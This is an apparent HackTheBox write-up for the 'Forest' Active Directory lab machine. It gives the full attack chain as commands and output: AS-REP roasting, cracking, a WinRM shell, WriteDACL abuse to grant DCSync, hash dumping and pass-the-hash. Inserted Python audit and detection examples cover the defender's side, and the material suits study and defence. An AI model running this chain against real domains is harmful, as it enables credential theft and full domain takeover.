Forest
Easy Windows Active Directory | HackTheBox
AS-REP Roast · WriteDACL · DCSync
Easy Windows Active Directory machine covering two fundamental AD attack techniques back to back. Anonymous SMB user enumeration surfaces svc-alfresco, which has Kerberos pre-authentication disabled — AS-REP Roasting captures a crackable hash. WinRM lands a shell. BloodHound maps the path: svc-alfresco is in Account Operators, which can add members to Exchange Windows Permissions, which holds WriteDACL on the domain root. That lets us grant DCSync rights to ourselves and dump the Administrator NT hash. A cleanup task races to revert group membership — chain the commands to beat it.
User Flag
c3617bf3aexxxxxxxxxxxxxxxxxxxxxx
Root Flag
ce23b727cfxxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan returns the standard DC fingerprint. Domain is htb.local, hostname is FOREST. Notably, port 5985 is open — WinRM is available, so evil-winrm will work once we have credentials.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.2.88
53/tcp    open  domain         Windows DNS
88/tcp    open  kerberos-sec   Windows KDC
389/tcp   open  ldap           Active Directory (Domain: htb.local)
445/tcp   open  microsoft-ds   Windows Server 2016 SMB
5985/tcp  open  wsman          WinRM
636/tcp   open  tcpwrapped     LDAPS
9389/tcp  open  mc-nmf         .NET Message Framing (AD Web Services)
env setup
$ echo "10.129.2.88 htb.local FOREST.htb.local" | sudo tee -a /etc/hosts
$ export IP=10.129.2.88
$ export DOMAIN=htb.local
02 SMB — User Enumeration via RID Cycling

Null session auth works. Share enumeration is denied, but user enumeration via RID cycling succeeds — 31 accounts are returned. Most are Exchange health mailboxes and system accounts. The interesting ones:

nxc — null auth user dump
$ nxc smb $IP -u '' -p '' --users
Administrator
svc-alfresco
sebastien
lucinda
andy
mark
santi
finding: svc-alfresco stands out — the svc- prefix signals a service account. Service accounts are high-value AS-REP/Kerberoast targets because they often have weaker passwords and sometimes have pre-authentication disabled.
03 AS-REP Roasting — svc-alfresco

Kerberos pre-authentication forces users to prove they know their password before the DC issues a ticket. When it's disabled on an account, anyone can request an encrypted AS-REP blob for that user — no credentials required — and crack it offline. This is AS-REP Roasting.

GetNPUsers — check user list
$ impacket-GetNPUsers $DOMAIN/ -dc-ip $IP -no-pass -usersfile users.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:962e26d7618bb19183b48f50486002af$7b1cc078...
common mistake: don't use -m 13100 (Kerberoasting) here. AS-REP hashes start with $krb5asrep$ and require -m 18200. Using the wrong mode gives "Signature unmatched" and no crack.
hashcat — crack AS-REP hash
$ hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:...:s3rvice
credential: svc-alfresco:s3rvice — cracked in ~2 seconds.
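The defender's side of the same exposure, as an added example that is not part of the original writeup: one function flags accounts whose userAccountControl carries the DONT_REQUIRE_PREAUTH bit that GetNPUsers keys on, the other flags Security event 4768 records in which the KDC issued a TGT with Pre-Authentication Type 0 and RC4 (0x17), which is what a roastable AS-REP looks like in the DC's log. The account list and event records are constructed; the field names on Event4768 are my own shorthand for the corresponding 4768 fields.

```python
"""Added example, not part of the original writeup: the defender's view of
the AS-REP roasting exposure above. All account and event data is constructed.
"""
from dataclasses import dataclass

DONT_REQUIRE_PREAUTH = 0x400000   # UF_DONT_REQUIRE_PREAUTH in userAccountControl
ACCOUNTDISABLE = 0x0002           # UF_ACCOUNTDISABLE
RC4_HMAC = 0x17                   # Kerberos etype 23, the $krb5asrep$23$ format
PA_NONE = 0                       # no pre-authentication data was supplied


def audit_preauth(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl) pairs as an
    LDAP query would return them. Returns the enabled accounts that do not
    require pre-auth, i.e. the ones GetNPUsers would get an AS-REP for."""
    return [name for name, uac in accounts
            if uac & DONT_REQUIRE_PREAUTH and not uac & ACCOUNTDISABLE]


@dataclass
class Event4768:
    account: str
    client_ip: str
    pre_auth_type: int
    ticket_encryption_type: int
    result_code: int   # 0 = ticket issued; e.g. 0x6 = principal unknown


def detect_asrep_requests(events):
    """Return (account, client_ip) for every TGT the KDC issued without
    pre-authentication and with RC4, i.e. every crackable AS-REP handed out.
    Failed requests are skipped: no ticket means nothing to crack."""
    return [(e.account, e.client_ip) for e in events
            if e.result_code == 0
            and e.pre_auth_type == PA_NONE
            and e.ticket_encryption_type == RC4_HMAC]


# constructed sample data
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x010200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("svc-alfresco", 0x410200),    # same, plus DONT_REQUIRE_PREAUTH
    ("old-svc", 0x410202),         # pre-auth disabled but the account itself is disabled
    ("sebastien", 0x010200),
]

SAMPLE_EVENTS = [
    Event4768("sebastien", "10.129.2.50", 2, 0x12, 0),     # PA-ENC-TIMESTAMP, AES256: normal
    Event4768("svc-alfresco", "10.10.14.7", 0, 0x17, 0),   # no pre-auth, RC4: roastable
    Event4768("nobody", "10.10.14.7", 0, 0x17, 0x6),       # principal unknown, no ticket
]

if __name__ == "__main__":
    print("pre-auth disabled:", audit_preauth(SAMPLE_ACCOUNTS))
    print("AS-REPs issued without pre-auth:", detect_asrep_requests(SAMPLE_EVENTS))
```

A legitimate client of an account with the flag set produces exactly the same 4768 pattern, so the alert only tells you the account is exposed; the fix is clearing the flag on the account, and the audit function is the quicker way to find every such account before someone runs GetNPUsers for you.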
04 Foothold — WinRM Shell
evil-winrm → user flag
$ nxc winrm $IP -u svc-alfresco -p 's3rvice'
[+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
$ evil-winrm -i $IP -u svc-alfresco -p 's3rvice'
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
c3617bf3aexxxxxxxxxxxxxxxxxxxxxx
05 BloodHound — Mapping the Attack Path

BloodHound maps all AD relationships — group memberships, ACL rights, sessions — and highlights attack paths visually. Always run it as a first step after getting any domain credentials.

bloodhound-python — full collection
$ bloodhound-python -u svc-alfresco -p 's3rvice' -d $DOMAIN -ns $IP -c All --zip

Import the zip into BloodHound and run Shortest Path to Domain Admin from svc-alfresco. The path:

attack path (BloodHound output)
svc-alfresco
  → MemberOf: Service Accounts
  → MemberOf: Privileged IT Accounts
  → MemberOf: Account Operators (built-in)
  → CanAddMember: Exchange Windows Permissions
  → WriteDACL on: htb.local (domain root)
  → grant DCSync → dump all hashes → Domain Admin
key insight: Exchange Windows Permissions has WriteDACL on the domain root — a leftover from Exchange installation. WriteDACL lets you rewrite the domain's ACL, including granting yourself DCSync rights. This misconfiguration has been known since the "PrivExchange" research (2018) and still appears in real environments with Exchange history.
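An audit check for that key insight, added here and not part of the original writeup: given the ACEs of the domain object (as read from nTSecurityDescriptor with SIDs already resolved to names), report any principal outside the expected Tier-0 set that can rewrite the DACL or that holds the replication rights DCSync needs. The ACE list is constructed to resemble Forest before and after the dacledit step; the NetBIOS name HTB and the EXPECTED_HOLDERS set are assumptions you would adjust per domain.

```python
"""Added example, not part of the original writeup: audit a domain object's
DACL for WriteDACL-class rights and for the replication extended rights.
ACE data below is constructed; access masks are assumed unmapped generic bits.
"""
from dataclasses import dataclass
from typing import Optional

# access-mask bits (ADS_RIGHTS_ENUM)
WRITE_DACL = 0x00040000
WRITE_OWNER = 0x00080000
GENERIC_ALL = 0x10000000
DS_CONTROL_ACCESS = 0x00000100   # "extended right"; object_type names which one

# the two rights GUIDs a DCSync needs on the domain object
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# principals expected to control or replicate a domain root (assumed; tune per domain)
EXPECTED_HOLDERS = {
    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "HTB\\Domain Admins",
    "HTB\\Enterprise Admins", "HTB\\Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
}


@dataclass
class Ace:
    principal: str
    access_mask: int
    object_type: Optional[str] = None   # rights GUID for an extended right; None = all
    ace_type: str = "allow"


def audit_domain_dacl(aces, expected=EXPECTED_HOLDERS):
    """Return (principal, finding) pairs for allow ACEs that let a principal
    outside `expected` rewrite the ACL or replicate directory secrets."""
    findings = []
    repl = {}   # principal -> replication rights it holds
    for ace in aces:
        if ace.ace_type != "allow" or ace.principal in expected:
            continue   # deny ACEs and expected holders are not exposures
        mask = ace.access_mask
        if mask & (WRITE_DACL | WRITE_OWNER | GENERIC_ALL):
            findings.append((ace.principal, "can rewrite the DACL (WriteDACL/WriteOwner/GenericAll)"))
        if mask & GENERIC_ALL:
            repl.setdefault(ace.principal, set()).update(DCSYNC_RIGHTS)   # implies every extended right
        elif mask & DS_CONTROL_ACCESS:
            if ace.object_type is None:          # control access with no GUID = all extended rights
                repl.setdefault(ace.principal, set()).update(DCSYNC_RIGHTS)
            elif ace.object_type.lower() in DCSYNC_RIGHTS:
                repl.setdefault(ace.principal, set()).add(ace.object_type.lower())
    for principal, held in repl.items():
        if held == DCSYNC_RIGHTS:
            findings.append((principal, "holds both replication rights: DCSync possible"))
        else:
            findings.append((principal, "holds one replication right: partial DCSync rights"))
    return findings


# constructed ACEs resembling the Forest domain root after the attack
SAMPLE_DOMAIN_ROOT_ACES = [
    Ace("NT AUTHORITY\\SYSTEM", GENERIC_ALL),
    Ace("HTB\\Domain Admins", GENERIC_ALL),
    Ace("HTB\\Domain Controllers", DS_CONTROL_ACCESS, DS_REPL_GET_CHANGES),
    Ace("HTB\\Domain Controllers", DS_CONTROL_ACCESS, DS_REPL_GET_CHANGES_ALL),
    Ace("HTB\\Exchange Windows Permissions", WRITE_DACL),                  # the Forest misconfiguration
    Ace("HTB\\svc-alfresco", DS_CONTROL_ACCESS, DS_REPL_GET_CHANGES),      # written by dacledit
    Ace("HTB\\svc-alfresco", DS_CONTROL_ACCESS, DS_REPL_GET_CHANGES_ALL),  # written by dacledit
    Ace("HTB\\Backup Operators", WRITE_DACL, ace_type="deny"),             # a deny ACE grants nothing
]

if __name__ == "__main__":
    for principal, finding in audit_domain_dacl(SAMPLE_DOMAIN_ROOT_ACES):
        print(f"{principal}: {finding}")
```

Run periodically against the live domain object and diff the output: the Exchange Windows Permissions finding is the standing misconfiguration to remove, while a new principal suddenly holding both replication rights is the dacledit step happening in front of you.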
06 WriteDACL → DCSync

The race: Forest runs a scheduled task that periodically resets Exchange Windows Permissions group membership. If you pause between adding the group and writing the DACL, your membership gets stripped and the DACL write fails with INSUFF_ACCESS_RIGHTS. Chain the commands with && so they fire back-to-back.

Step 1 — from your evil-winrm shell, add svc-alfresco to Exchange Windows Permissions using Account Operators privileges:

evil-winrm — add to group
*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.

Step 2 — immediately from Kali, grant DCSync rights and dump NTDS in one chained command before the cleanup task fires:

dacledit + secretsdump — chained
$ dacledit.py -action 'write' -rights 'DCSync' \
    -principal 'svc-alfresco' \
    -target-dn 'DC=HTB,DC=LOCAL' \
    'htb.local'/'svc-alfresco':'s3rvice' \
    -dc-ip $IP && \
  impacket-secretsdump htb.local/svc-alfresco:s3rvice@$IP
[*] DACL modified successfully!
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
Administrator NT hash: 32693b11e6aa90eb43d32c72a07ceea6. DCSync impersonates a DC replication request — the real DC responds with credentials for any account you ask for, including NT hashes and Kerberos keys, without touching LSASS or any files on disk.
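Detection logic for those replication requests, as an added example that is not part of the original writeup: with directory service access auditing on, the DC logs Security event 4662 for the request, and the telltale combination is Access Mask 0x100 (Control Access) with a replication rights GUID in the Properties field. Other domain controllers and known directory-sync accounts replicate legitimately, so they go on an allow list; anything else is an alert. The records below are constructed; the key names follow the event's XML field names and the allow list (FOREST$) is an assumption for this lab.

```python
"""Added example, not part of the original writeup: flag 4662 events that
carry the DCSync replication rights from accounts that should not replicate.
Sample records are constructed.
"""
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def is_replication_access(event):
    """True for a 4662 whose access mask includes Control Access and whose
    Properties list at least one of the two replication rights."""
    if event.get("EventID") != 4662:
        return False
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return False
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return bool(guids & REPLICATION_GUIDS)


def detect_rogue_dcsync(events, known_replicators):
    """Return the sorted set of accounts that issued replication requests and
    are not on the allow list. Allow-list specific DC computer accounts
    rather than every name ending in '$': a joined rogue machine account
    would otherwise slip through."""
    return sorted({e["SubjectUserName"] for e in events
                   if is_replication_access(e)
                   and e["SubjectUserName"] not in known_replicators})


# constructed sample records; 19195a5b-... is the domainDNS class GUID that
# accompanies the rights GUID in real 4662 Properties fields
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "sebastien", "AccessMask": "0x10",
     "Properties": "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},   # read property, not replication
    {"EventID": 4624, "SubjectUserName": "andy", "AccessMask": "0x0", "Properties": ""},
]

KNOWN_REPLICATORS = {"FOREST$"}   # the only DC in this lab; add sync-service accounts in real estates

if __name__ == "__main__":
    print("rogue replication by:", detect_rogue_dcsync(SAMPLE_EVENTS, KNOWN_REPLICATORS))
```

The same request is also visible on the wire as DRSUAPI traffic from a non-DC address, which is the other signal worth correlating when the 4662 volume on a busy DC makes the log alone noisy.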
07 Root — Pass-the-Hash
evil-winrm PTH → root flag
$ evil-winrm -i $IP -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
ce23b727cfxxxxxxxxxxxxxxxxxxxxxx
08 Full Attack Chain
attack chain summary
Nmap → DC identified, domain: htb.local, WinRM open on 5985
  │
  ▼
SMB null auth → RID cycling → 31 accounts dumped → svc-alfresco flagged (service account, svc- prefix)
  │
  ▼
GetNPUsers → svc-alfresco has pre-auth disabled → AS-REP hash
hashcat -m 18200 → svc-alfresco:s3rvice
  │
  ▼
evil-winrm → WinRM shell → user.txt ✓
  │
  ▼
BloodHound → attack path found: svc-alfresco → Account Operators → Exchange Windows Permissions → WriteDACL on htb.local → DCSync
  │
  ▼
net group add → Exchange Windows Permissions membership (cleanup task races — chain next steps immediately)
  │
  ▼
dacledit && secretsdump → DCSync rights written → NTDS dumped → Administrator NT: 32693b11e6aa90eb43d32c72a07ceea6
  │
  ▼
evil-winrm PTH → Administrator shell → root.txt ✓
key takeaways:
· AS-REP Roasting requires no credentials — pre-auth disabled accounts are exposed to anyone on the network
· AS-REP = -m 18200; Kerberoast = -m 13100 — know the difference before you crack
· Exchange Windows Permissions + WriteDACL on domain root = DCSync path; present in any AD with Exchange history
· WriteDACL on the domain object lets you grant yourself any right, including replication rights
· DCSync leaves no LSASS touch, no file drop — hard to detect without monitoring for rogue replication requests
· Chain exploit steps with && when a cleanup task can revert your changes between commands
· BloodHound should be your first move after getting any domain credentials